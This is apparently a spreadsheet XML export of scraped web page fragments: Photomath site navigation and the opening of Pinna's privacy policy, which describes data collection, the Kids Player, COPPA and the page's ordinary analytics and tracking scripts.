    <t xml:space="preserve">22.7497C125.555 23.5868 125.072 24.3081 124.458 24.9123C123.845 25.5168 123.11 25.9864 122.255 26.3211C121.4 26.656 120.47 26.8232 119.466 26.8232C118.462 26.8232 117.533 26.656 116.678 26.3211C115.822 25.9864 115.088 25.5168 114.475 24.9123C113.861 24.3081 113.378 23.5868 113.024 22.7497C112.671 21.9126 112.495 20.9829 112.495 19.9598ZM114.837 19.9598C114.837 20.6479 114.944 21.285 115.158 21.871C115.371 22.4567 115.683 22.9685 116.092 23.4053C116.501 23.8427 116.989 24.1868 117.556 24.4378C118.123 24.6889 118.76 24.8144 119.466 24.8144C120.173 24.8144 120.809 24.6889 121.377 24.4378C121.943 24.1868 122.432 23.8427 122.841 23.4053C123.249 22.9685 123.561 22.4567 123.775 21.871C123.988 21.285 124.096 20.6479 124.096 19.9598C124.096 19.2716 123.988 18.6342 123.775 18.0482C123.561 17.4625 123.249 16.951 122.841 16.5139C122.432 16.0768 121.943 15.7325 121.377 15.4814C120.809 15.2303 120.173 15.1048 119.466 15.1048C118.76 15.1048 118.123 15.2303 117.556 15.4814C116.989 15.7325 116.501 16.0768 116.092 16.5139C115.683 16.951 115.371 17.4625 115.158 18.0482C114.944 18.6342 114.837 19.2716 114.837 19.9598Z"/&gt;
  &lt;path class="u-icon__logo-text" d="M129.791 16.5276C129.791 15.9328 129.772 15.3747 129.735 14.8538C129.698 14.3331 129.679 13.8586 129.679 13.4307H131.743C131.743 13.7842 131.752 14.138 131.771 14.4908C131.789 14.8443 131.798 15.2072 131.798 15.579H131.854C132.003 15.2629 132.212 14.9562 132.482 14.6583C132.751 14.3611 133.072 14.096 133.444 13.8632C133.816 13.6307 134.234 13.4446 134.699 13.3051C135.163 13.1656 135.665 13.0957 136.205 13.0957C136.911 13.0957 137.501 13.1845 137.975 13.3607C138.45 13.538 138.844 13.7516 139.161 14.0027C139.477 14.2538 139.723 14.5233 139.9 14.8118C140.076 15.1003 140.22 15.3559 140.332 15.579C140.815 14.7978 141.373 14.1887 142.005 13.7516C142.637 13.3149 143.455 13.0957 144.459 13.0957C145.388 13.0957 146.169 13.2212 146.802 13.4726C147.433 13.7237 147.945 14.0863 148.335 14.5607C148.726 15.0349 149.005 15.6118 149.172 16.2905C149.339 16.9698 149.423 17.7272 149.423 18.5646V26.4885H147.248V18.6762C147.248 18.2297 147.201 17.7929 147.108 17.3646C147.015 16.937 146.848 16.5555 146.606 16.2209C146.365 15.8859 146.039 15.6167 145.63 15.4115C145.221 15.2072 144.701 15.1048 144.069 15.1048C143.604 15.1048 143.167 15.1981 142.758 15.3838C142.349 15.5698 141.991 15.83 141.684 16.165C141.378 16.4999 141.136 16.9042 140.959 17.3786C140.783 17.8531 140.694 18.379 140.694 18.9552V26.4885H138.519V19.0947C138.519 17.6437 138.324 16.616 137.934 16.0115C137.543 15.4072 136.902 15.1048 136.009 15.1048C135.303 15.1048 134.694 15.2258 134.183 15.4674C133.671 15.7094 133.253 16.0534 132.928 16.4999C132.602 16.9461 132.36 17.4762 132.203 18.0902C132.045 18.7042 131.966 19.3832 131.966 20.1272V26.4885H129.791V16.5276Z"/&gt;
  &lt;path class="u-icon__logo-text" d="M153.395 15.1048C154.064 14.4167 154.859 13.9097 155.779 13.5842C156.7 13.259 157.634 13.0957 158.582 13.0957C160.515 13.0957 161.909 13.552 162.765 14.4629C163.62 15.3747 164.048 16.7604 164.048 18.6203V24.2284C164.048 24.6011 164.066 24.9868 164.104 25.3864C164.141 25.7868 164.187 26.1539 164.243 26.4886H162.151C162.077 26.1913 162.035 25.8609 162.026 25.498C162.016 25.1354 162.012 24.8144 162.012 24.5357H161.956C161.528 25.205 160.957 25.7539 160.241 26.1819C159.525 26.6092 158.666 26.8232 157.662 26.8232C156.992 26.8232 156.365 26.7396 155.779 26.5721C155.194 26.405 154.682 26.1585 154.245 25.8329C153.809 25.5077 153.46 25.1032 153.2 24.6193C152.939 24.1357 152.809 23.5777 152.809 22.9451C152.809 21.8664 153.088 21.0199 153.646 20.4059C154.204 19.7923 154.896 19.3367 155.723 19.0388C156.55 18.7416 157.443 18.5552 158.401 18.4811C159.358 18.4066 160.236 18.3692 161.036 18.3692H161.872V17.9786C161.872 17.03 161.589 16.3142 161.022 15.83C160.455 15.3464 159.66 15.1048 158.638 15.1048C157.931 15.1048 157.239 15.2209 156.56 15.4534C155.881 15.6863 155.282 16.044 154.762 16.5276L153.395 15.1048ZM159.697 20.2108C158.303 20.2108 157.197 20.4059 156.379 20.7968C155.561 21.1871 155.152 21.829 155.152 22.722C155.152 23.5406 155.426 24.1217 155.975 24.4658C156.522 24.8102 157.206 24.9819 158.024 24.9819C158.656 24.9819 159.209 24.8752 159.683 24.6612C160.158 24.4472 160.552 24.1637 160.869 23.8099C161.185 23.457 161.426 23.0427 161.594 22.5686C161.761 22.0941 161.854 21.5874 161.872 21.0479V20.2108H159.697Z"/&gt;
  &lt;path class="u-icon__logo-text" d="M175.426 15.3064H171.578V21.8352C171.578 22.2632 171.587 22.6583 171.606 23.0209C171.624 23.3838 171.699 23.7002 171.829 23.9698C171.959 24.2394 172.154 24.4534 172.414 24.6115C172.675 24.7695 173.046 24.8485 173.53 24.8485C173.846 24.8485 174.171 24.8115 174.506 24.737C174.84 24.6629 175.157 24.5513 175.454 24.402L175.538 26.3832C175.166 26.5507 174.752 26.6713 174.297 26.7458C173.841 26.8202 173.409 26.8573 173 26.8573C172.219 26.8573 171.596 26.7552 171.131 26.5507C170.667 26.3461 170.304 26.058 170.044 25.6856C169.784 25.3136 169.612 24.8534 169.528 24.3045C169.444 23.7559 169.402 23.1464 169.402 22.4772V15.3064H166.558V13.4648H169.402V9.75391H171.578V13.4648H175.426V15.3064Z"/&gt;
  &lt;path class="u-icon__logo-text" d="M188.999 14.6074C188.59 14.1427 188.074 13.7801 187.452 13.5193C186.829 13.2588 186.089 13.1287 185.234 13.1287C184.733 13.1287 184.258 13.1941 183.812 13.3238C183.366 13.4542 182.962 13.6217 182.599 13.8263C182.237 14.0311 181.925 14.2588 181.665 14.5098C181.405 14.7609 181.2 15.0168 181.052 15.277H180.996V7.24805H178.821V26.5215H180.996V20.1599C180.996 19.4162 181.075 18.7368 181.233 18.1232C181.391 17.5092 181.632 16.9791 181.958 16.5326C182.283 16.0861 182.701 15.7424 183.213 15.5004C183.724 15.2588 184.333 15.1375 185.039 15.1375C186.062 15.1375 186.815 15.4539 187.298 16.0861C187.781 16.7186 188.023 17.5837 188.023 18.6809V26.5215H190.199V18.4578C190.199 17.6767 190.101 16.956 189.906 16.2955C189.711 15.6354 189.408 15.0724 188.999 14.6074Z" /&gt;
  &lt;path class="u-icon__logo-text" d="M81.5221 14.6074C81.113 14.1427 80.5973 13.7801 79.9745 13.5193C79.3514 13.2588 78.6125 13.1287 77.7576 13.1287C77.2555 13.1287 76.7816 13.1941 76.3355 13.3238C75.889 13.4542 75.4847 13.6217 75.1221 13.8263C74.7595 14.0311 74.4483 14.2588 74.1878 14.5098C73.9273 14.7609 73.7231 15.0168 73.5745 15.277H73.5186V7.24805H71.3436V26.5215H73.5186V20.1599C73.5186 19.4162 73.5976 18.7368 73.756 18.1232C73.9134 17.5092 74.1553 16.9791 74.4808 16.5326C74.8057 16.0861 75.2242 15.7424 75.7358 15.5004C76.2467 15.2588 76.8555 15.1375 77.5621 15.1375C78.5846 15.1375 79.3374 15.4539 79.821 16.0861C80.3042 16.7186 80.5462 17.5837 80.5462 18.6809V26.5215H82.7215V18.4578C82.7215 17.6767 82.6236 16.956 82.4285 16.2955C82.2334 15.6354 81.9309 15.0724 81.5221 14.6074Z" /&gt;
  &lt;path class="u-icon__logo-text" d="M56.3346 31.6466V24.1728H56.3902C56.7989 24.9172 57.4451 25.5448 58.3284 26.0564C59.211 26.5672 60.2386 26.8232 61.4097 26.8232C62.3206 26.8232 63.1759 26.6511 63.9752 26.3074C64.7746 25.9633 65.4672 25.4843 66.0529 24.8703C66.6386 24.2564 67.0988 23.5308 67.4334 22.6941C67.7681 21.857 67.9352 20.9458 67.9352 19.9598C67.9352 18.9738 67.7681 18.0622 67.4334 17.2251C67.0988 16.3884 66.6337 15.6625 66.0389 15.0489C65.4438 14.4352 64.7235 13.9562 63.8776 13.6121C63.0315 13.2681 62.0975 13.0957 61.075 13.0957C60.1271 13.0957 59.2578 13.2912 58.4679 13.6817C57.6773 14.0726 56.985 14.6212 56.3902 15.3279H56.3346V13.4307H54.1593V31.6466H56.3346ZM56.6552 18.0482C56.8685 17.4625 57.1801 16.951 57.5892 16.5139C57.998 16.0768 58.4861 15.7325 59.0533 15.4814C59.6201 15.2303 60.2568 15.1048 60.9635 15.1048C61.6698 15.1048 62.3066 15.2303 62.8737 15.4814C63.4406 15.7325 63.9287 16.0768 64.3378 16.5139C64.7466 16.951 65.0581 17.4625 65.2721 18.0482C65.4854 18.6342 65.5928 19.2716 65.5928 19.9598C65.5928 20.6479 65.4854 21.285 65.2721 21.871C65.0581 22.4567 64.7466 22.9685 64.3378 23.4053C63.9287 23.8427 63.4406 24.1868 62.8737 24.4378C62.3066 24.6889 61.6698 24.8144 60.9635 24.8144C60.2568 24.8144 59.6201 24.6889 59.0533 24.4378C58.4861 24.1868 57.998 23.8427 57.5892 23.4053C57.1801 22.9685 56.8685 22.4567 56.6552 21.871C56.4412 21.285 56.3346 20.6479 56.3346 19.9598C56.3346 19.2716 56.4412 18.6342 56.6552 18.0482Z"/&gt;
&lt;/svg&gt;
            &lt;/a&gt;
        </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
		            &lt;ul class="c-navigation__list u-b1"&gt;
									                        &lt;li&gt;
                            &lt;a class=""
                               href="https://photomath.com/en/parents"&gt;
                                &lt;span&gt;Parents&lt;/span&gt;
                            &lt;/a&gt;
                        &lt;/li&gt;
														                        &lt;li&gt;
                            &lt;a class=""
                               href="https://photomath.com/en/teachers"&gt;
                                &lt;span&gt;Teachers&lt;/span&gt;
                            &lt;/a&gt;
                        &lt;/li&gt;
														                        &lt;li&gt;
                            &lt;a class=""
                               href="https://photomath.com/en/photomath-plus"&gt;
                                &lt;span&gt;Photomath Plus&lt;/span&gt;
                            &lt;/a&gt;
                        &lt;/li&gt;
														                        &lt;li class="c-navigation__dropdown u-b1"&gt;
                            &lt;a href="#"
                               class=""&gt;
                                &lt;span&gt;Math Explained&lt;/span&gt;
                                &lt;i&gt;
									&lt;svg class="u-icon u-icon--chevron-down" viewBox="0 0 14 9" fill="none" xmlns="http://www.w3.org/2000/svg"&gt;
    &lt;path fill-rule="evenodd" clip-rule="evenodd" d="M2 0.93934L7.00002 5.93934L12 0.93934L13.0607 2L7.00002 8.06066L0.93934 2L2 0.93934Z"&gt;&lt;/path&gt;
&lt;/svg&gt;
                                &lt;/i&gt;
                            &lt;/a&gt;
                            &lt;ul&gt;
								                                    &lt;li&gt;
                                        &lt;a href="https://photomath.com/en/arithmetic"&gt;
                                            &lt;span&gt;Arithmetic&lt;/span&gt;
                                        &lt;/a&gt;
                                    &lt;/li&gt;
								                                    &lt;li&gt;
                                        &lt;a href="https://photomath.com/en/algebra"&gt;
                                            &lt;span&gt;Algebra&lt;/span&gt;
                                        &lt;/a&gt;
                                    &lt;/li&gt;
								                                    &lt;li&gt;
                                        &lt;a href="https://photomath.com/en/calculus"&gt;
                                            &lt;span&gt;Calculus&lt;/span&gt;
                                        &lt;/a&gt;
                                     &lt;/li&gt;
								                            &lt;/ul&gt;
                        &lt;/li&gt;
									            &lt;/ul&gt;
					            &lt;div class="c-language-switch u-uppercase u-b2"&gt;
                &lt;div class="c-language-switch__active"&gt;
                    &lt;img src="https://photomath.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png" alt="en"&gt;
                    &lt;span&gt;EN&lt;/span&gt;
                &lt;/div&gt;
                &lt;ul class="c-language-switch__dropdown"&gt;
					                        &lt;li class="c-language-switch__item c-language-switch__item--active"&gt;
                            &lt;a href="https://photomath.com/en/privacypolicy" class="c-language-switch__link"&gt;
                                &lt;img src="https://photomath.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png" alt="en"&gt;
                                &lt;span&gt;en&lt;/span&gt;
								&lt;svg class="u-icon u-icon--checkmark" viewBox="0 0 18 14" fill="none" xmlns="http://www.w3.org/2000/svg"&gt;
    &lt;path d="M6 11.1996L1.8 6.99961L0.400002 8.39961L6 13.9996L18 1.99961L16.6 0.599609L6 11.1996Z"/&gt;
&lt;/svg&gt;
                            &lt;/a&gt;
                        &lt;/li&gt;
					                        &lt;li class="c-language-switch__item "&gt;
                            &lt;a href="https://photomath.com/it/privacypolicy" class="c-language-switch__link"&gt;
                                &lt;img src="https://photomath.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/it.png" alt="it"&gt;
                                &lt;span&gt;it&lt;/span&gt;
					</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;
&lt;title&gt;Pinna Privacy Policy - Pinna&lt;/title&gt;
&lt;meta name="description" content="The Privacy Policy provides details around how we value and respect your privacy at Pinna. Please read to learn more. "</t>
  </si>
  <si>
    <t>/&gt;
&lt;meta property="og:url" content="https://pinna.fm/privacy-policy" /&gt;
&lt;meta property="og:type" content="website" /&gt;
&lt;meta property="og:title" content="Pinna Privacy Policy - Pinna" /&gt;
&lt;meta property="og:image" content="https://pinna.fm/uploads/_1200x630_crop_center-center_none/share.jpg" /&gt;
&lt;meta property="og:description" content="The Privacy Policy provides details around how we value and respect your privacy at Pinna. Please read to learn more. "</t>
  </si>
  <si>
    <t>/&gt;
&lt;meta property="og:site_name" content="Pinna Audio" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:locale:alternate" content="en_US" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:site" content="pinnaaudio" /&gt;
&lt;meta name="twitter:url" content="https://pinna.fm/privacy-policy" /&gt;
&lt;meta name="twitter:title" content="Pinna Privacy Policy - Pinna" /&gt;
&lt;meta name="twitter:description" content="The Privacy Policy provides details around how we value and respect your privacy at Pinna. Please read to learn more. "</t>
  </si>
  <si>
    <t>/&gt;
&lt;meta name="twitter:image" content="https://pinna.fm/uploads/_1200x600_crop_center-center_none/share.jpg" /&gt;
&lt;link rel="home" href="https://pinna.fm/" /&gt;
&lt;link rel="canonical" href="https://pinna.fm/privacy-policy"&gt;
		&lt;link rel="icon" type="image/png" sizes="16x16" href="https://pinna.fm/assets/media/global/favicon/favicon-16x16.png"&gt;
	&lt;link rel="icon" type="image/png" sizes="32x32" href="https://pinna.fm/assets/media/global/favicon/favicon-32x32.png"&gt;
	&lt;link rel="icon" type="image/png" sizes="96x96" href="https://pinna.fm/assets/media/global/favicon/favicon-96x96.png"&gt;
	&lt;link rel="icon" type="image/png" sizes="192x192" href="https://pinna.fm/assets/media/global/favicon/favicon-192x192.png"&gt;
	&lt;script src="https://api-data.pinna.fm/js/pup.js?id=9" data-apiEndpoint="https://api.pinna.fm/api/v1/"&gt;&lt;/script&gt;
	&lt;script&gt;
	window.dataLayer = window.dataLayer || [];
    if (!window.gtag) {
        window.gtag = function () {
            dataLayer.push(arguments);
        }
    }
	if (window.pup &amp;&amp; !window.pup.allowAdvertising) {
		gtag('set', 'allow_google_signals', false);
		gtag('set', 'allow_ad_personalization_signals', false);
    }
&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager --&gt;
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
         j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
        'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer', 'GTM-KP7N4MW');&lt;/script&gt;
&lt;!-- End Google Tag Manager --&gt;
&lt;!--Facebook</t>
  </si>
  <si>
    <t>Pixel Code --&gt;
&lt;script&gt;!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js');if(pup &amp;&amp; !pup.allowAdvertising){fbq('consent', 'revoke');}if(pup &amp;&amp; !pup.allowAnalytics){fbq('dataProcessingOptions', ['LDU'], 0, 0);}fbq('init', '371828523655427');fbq('track', 'PageView');&lt;/script&gt;&lt;noscript&gt;&lt;img height="1" width="1" style="display:none"src="https://www.facebook.com/tr?id=371828523655427&amp;ev =PageView&amp;noscript=1"/&gt;&lt;/noscript&gt;
&lt;!--End Facebook Pixel Code --&gt;
&lt;meta name="facebook-domain-verification" content="oai2gpxeqcelx0bv7be3pzft8glfnp" /&gt;
    &lt;!-- Appsflyer --&gt;
    &lt;script&gt;
    !</t>
  </si>
  <si>
    <t>function(t,e,n,s,a,c,i,o,p){t. AppsFlyerSdkObject=a,t.AF=t.AF||function(){
    (t.AF.q=t.AF.q||[]).push([Date.now()].concat(Array.prototype.slice.call(arguments)))},
    t.AF.id=t.AF.id||i,t.AF.plugins={},o=e.createElement(n),p=e.getElementsByTagName(n)[0],o.async=1,
    o.src="https://websdk.appsflyer.com?"+(c.length&gt;0?"st="+c.split(",").sort().join(",")+"&amp;":"")+(i.length&gt;0?"af_id="+i:""),
    p.parentNode.insertBefore(o,p)}(window,document,"script",0,"AF","pba",{pba: {webAppId: "27c53e23-88f2-4d76-b46d-bd03d1ba3361"}})
    &lt;/script&gt;
    &lt;!-- End Appsflyer --&gt;
	&lt;script&gt;
        siteData = {
            'assets': 'https://pinna.fm/assets',
			'siteUrl': 'https://pinna.fm/',
			'apiUrl': 'https://api.pinna.fm/api/v1',
			'defaultCookieDomain': '.pinna.fm'
        };
	&lt;/script&gt;
			&lt;script src="https://www.googleoptimize.com/</t>
  </si>
  <si>
    <t>optimize.js?id=OPT-KXPRXX6"&gt;&lt;/script&gt;
	&lt;link href="https://pinna.fm/assets/css/copy.css?id=9" rel="stylesheet"&gt;
&lt;link href="https://pinna.fm/assets/css/vendor.css?id=9" rel="stylesheet"&gt;
&lt;link href="https://pinna.fm/assets/css/common.css?id=9" rel="stylesheet"&gt;&lt;/head&gt;
&lt;body class=""&gt;
			&lt;!-- Google Tag Manager (noscript) --&gt;
		&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KP7N4MW"
						  height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
		&lt;!-- End Google Tag Manager (noscript) --&gt;
	&lt;a href="#main-content" class="skip-to-main-content"&gt;Skip to main content&lt;/a&gt;
		&lt;header&gt;
&lt;div class="c-header"&gt;
	&lt;div class="c-header__wrap"&gt;
		&lt;div class="container container-wide"&gt;
			&lt;div class="c-header__logo"&gt;
				&lt;a href="https://pinna.fm/" data-ga-category="header" data-ga-action="logo"&gt;				&lt;img src="https://pinna.fm/assets/media/global/pinna-logo.png" alt="Pinna" /&gt;
				&lt;/a&gt;			&lt;/div&gt;
					&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;
	&lt;/header&gt;
	&lt;main id="main-content"&gt;
					&lt;div id="c-util-title"&gt;
	&lt;div class="container-wide"&gt;
		&lt;div class="c-util-container"&gt;
			&lt;h1 class="h1 c-util-header"&gt;Privacy Policy&lt;/h1&gt;
							&lt;div class="c-util-subtitle"&gt;Effective Date: June 2, 2022&lt;/div&gt;
					&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;
		&lt;section&gt;
		&lt;div class="container-wide"&gt;
			&lt;div class="container-content"&gt;
				&lt;div class="rich-text"&gt;
	&lt;p&gt;&lt;strong&gt;Pinna.fm Privacy Policy&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SPECIAL NOTE:&lt;/strong&gt; Please read &lt;a href="#tracking"&gt;“Does Pinna track my kids’ activity?”&lt;/a&gt; for an overview of our information collection practices when an adult or child accesses the Kids Player.</t>
  </si>
  <si>
    <t>Please see &lt;a href="#privacy"&gt;“Children’s Privacy”&lt;/a&gt; for more information about how we collect, use, and disclose information that we may receive when a child is using the Kids Player. We encourage you to read our entire Privacy Policy.&lt;/p&gt;
&lt;p&gt;Pinna Media LLC (“Pinna,” “we,” or “us”) is committed to bringing you services and communications tailored to your individual needs while respecting your privacy. This Privacy Policy describes how we collect, use, and disclose certain information.&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>We collect information from visitors to our website (&lt;a href="http://www.pinna.fm/"&gt;www.pinna.fm&lt;/a&gt;), mobile applications (&lt;a href="https://apps.apple.com/us/app/pinna-podcasts-audiobooks/id1218953380"&gt;Apple&lt;/a&gt; | &lt;a href="https://play.google.com/store/apps/details?id=fm.pinna.app&amp;amp;hl=en_US"&gt;Android&lt;/a&gt; | &lt;a href="https://www.amazon.com/gp/product/B07Q2CGSV8/ref=mas_dl"&gt;Amazon&lt;/a&gt;), social media pages, and any other place that links to or posts this Privacy Policy. Collectively, these are our “Services.” In this Policy, when we refer to “Services” with respect to our website and app, we specifically mean the portion of the website and app that are targeted to adults and do &lt;strong&gt;not&lt;/strong&gt; stream Content.&lt;/li&gt;&lt;li&gt;We make podcasts, audiobooks, or other content (“Content”) available to you and your kids via the streaming media player on our website or app, which this Policy calls the “Kids Player.”</t>
  </si>
  <si>
    <t>It’s necessary to log in to your account to get access to the Kids Player. We collect less information on the Kids Player than we do on our Services to protect kids’ privacy – please read on for more information.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This Privacy Policy does not apply to non-Pinna websites and mobile applications that may link to the Services or be linked to from the Services; please review the privacy policies on those websites and applications directly to understand their privacy practices.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Updates to this Policy&lt;/em&gt;: We may modify this Privacy Policy at any time by posting revisions to the Privacy Policy with an updated effective date or other appropriate notice.</t>
  </si>
  <si>
    <t>If any changes are made to the Privacy Policy that would affect information collected from or about children in a way that would require parental consent under COPPA, we will obtain such consent from a parent or legal guardian.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Data Controller&lt;/em&gt;: As it pertains to users of our Services or Kids Player located in the EU, the controller of your personal data is Pinna Media LLC, 249 Smith Street, #134, Brooklyn, NY 11231 USA.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a id="tracking"&gt;&lt;/a&gt;Does Pinna track my kids' or students' activity?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;When you use our Services, including to listen to Content, &lt;/em&gt;&lt;em&gt;we absolutely do not collect, or use, sell, or disclose your kid’s/student’s name, address, email, or any other information that would personally and directly identify him or her&lt;/em&gt;. In fact, we have no mechanism or business reason to collect that information in the Services or our Kids Player.</t>
  </si>
  <si>
    <t>There are circumstances, such as when we offer contests or rewards programs, where we will ask parents or teachers to provide their child’s or student’s information. If we collect that information, we treat it according to the privacy notice we provide at the time we request the child’s or student’s information.&lt;/p&gt;
&lt;p&gt;Second, we collect analytics information automatically about our users’ devices that access the Kids Player. The third parties we use for this purpose are listed in our Privacy Policy.</t>
  </si>
  <si>
    <t>This information is, for example, IP address and browser type. Like most other internet-enabled businesses, we need analytics to effectively run our business; for example, it is important to know which shows are popular across our user base. If you allow your kids/students to use the Kids Player, we will gather information about that activity for our internal analytics.</t>
  </si>
  <si>
    <t>&lt;em&gt;But the analytics information we collect does not allow us to personally identify you or your kid/student, and we do not use it for marketing purposes&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Thank you for reading. Our goal is to earn your trust and provide an exceptional service. Please don’t hesitate to contact us at contact@pinna.fm with any questions.&lt;/p&gt;
&lt;ol&gt;&lt;li&gt;&lt;strong&gt;Information We Collect&lt;/strong&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;a. &lt;em&gt;&lt;strong&gt;Information We Collect from the Services&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We collect the following types of information when you use the Services.&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Personal Identifiers: name, e-mail address; correspondence and other information that you send to us; stories, comments, photos, and other information you post in our interactive online features. In limited circumstances when you contact us, we may ask for your postal address and/or telephone number.</t>
  </si>
  <si>
    <t>When you create an account, we collect email address, password, and communications preferences.&lt;/li&gt;&lt;li&gt; Commercial Information: payment information, such as credit card number and expiration date.&lt;/li&gt;&lt;li&gt;Geolocation: imprecise location (e.g., location derived from IP address).&lt;/li&gt;&lt;li&gt;Audio: when using the [voice activated show experience], device microphones may capture audio information (e.g., a “yes” or “no” response), including users’ voices. This information will not be combined with other device information such that the user’s voice will be identifiable.&lt;/li&gt;&lt;li&gt;Electronic Network, Analytics, and Service Activity: browser type and operating system; Internet Protocol (IP) address, which is the number automatically assigned to your computer whenever you access the Internet and that can sometimes be used to derive your general geographic area; search queries; other unique identifiers, including mobile device identification numbers; sites you visited before and after visiting the Services; pages you view and links you click on within the Services; information about your interactions with e-mail messages, such as the links clicked on and whether the messages were opened or forwarded; and information stored in server logs.&lt;/li&gt;&lt;li&gt;Inferences drawn to create a profile about a consumer reflecting the consumer’s preferences or characteristics: We may analyze your preferences based on the surveys you take and the information we and our partners gather when you interact with our Services.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;b. &lt;em&gt;&lt;strong&gt;Information We Collect from the Kids Player&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The information we collect when you access the Kids Player is limited to:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Electronic Network, Analytics, and Service Activity: browser type and operating system; Internet Protocol (IP) address; mobile device identification numbers; Content you view; and links you click on within the Kids Player.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Our iOS app does not collect mobile advertising identifiers, such as Apple’s IDFA.&lt;/p&gt;
&lt;p&gt;We may “de-identify” information so that it cannot be linked back to an individual. For example, we may generate statistics about the general geographic regions from which users access our websites.</t>
  </si>
  <si>
    <t>We may use and disclose de-identified information for any purpose.&lt;/p&gt;
&lt;p&gt;c.&lt;em&gt; &lt;strong&gt; Our Sources of Information&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We may collect information you provide directly via the Services.</t>
  </si>
  <si>
    <t>For example, we may ask you for contact information and account set-up information when you register with our Services, access various content or features, register for contests or sweepstakes, submit comments and other content, order products, or directly contact us with questions or feedback.&lt;/p&gt;
&lt;p&gt; We may collect certain information automatically when you use the Services or Kids Player. For example, we collect information about your device when you browse our website and app or access Content via the Kids Player.</t>
  </si>
  <si>
    <t>We may use cookies, pixel tags, Local Shared Objects (sometimes referred to as “Flash Cookies”), and other technologies to automatically collect this information.&lt;/p&gt;
&lt;p&gt; The types of cookies and tracking technologies our partners use can be categorized as:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;Analytics: These technologies help us to understand how visitors interact with our Services and Kids Player by collecting and reporting information about how you and your device interact with the Services or Kids Player.&lt;/li&gt;&lt;li&gt;Advertising: These technologies allow us to serve relevant advertising to you on other websites or apps.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Below is a list of our tracking partners with links to more information about their use of your information and how to exercise your options regarding tracking. Please also see “Your Rights and Choices” below.&lt;/p&gt;
&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;&lt;strong&gt;Category&lt;/strong&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;strong&gt;Partner&lt;/strong&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;strong&gt;Present in the Kids Player?&lt;/strong&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;strong&gt;Further Information&lt;/strong&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Analytics&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>Google Analytics&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Yes&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://policies.google.com/technologies/partner-sites?hl=en-US"&gt;Google Privacy and Terms&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Analytics&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt; MyFonts Counter&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;No&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;&lt;a href="https://www.myfonts.com/legal/website-use-privacy-policy"&gt;Privacy Policy&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;Analytics&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt; Yahoo Analytics&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;</t>
  </si>
  <si>
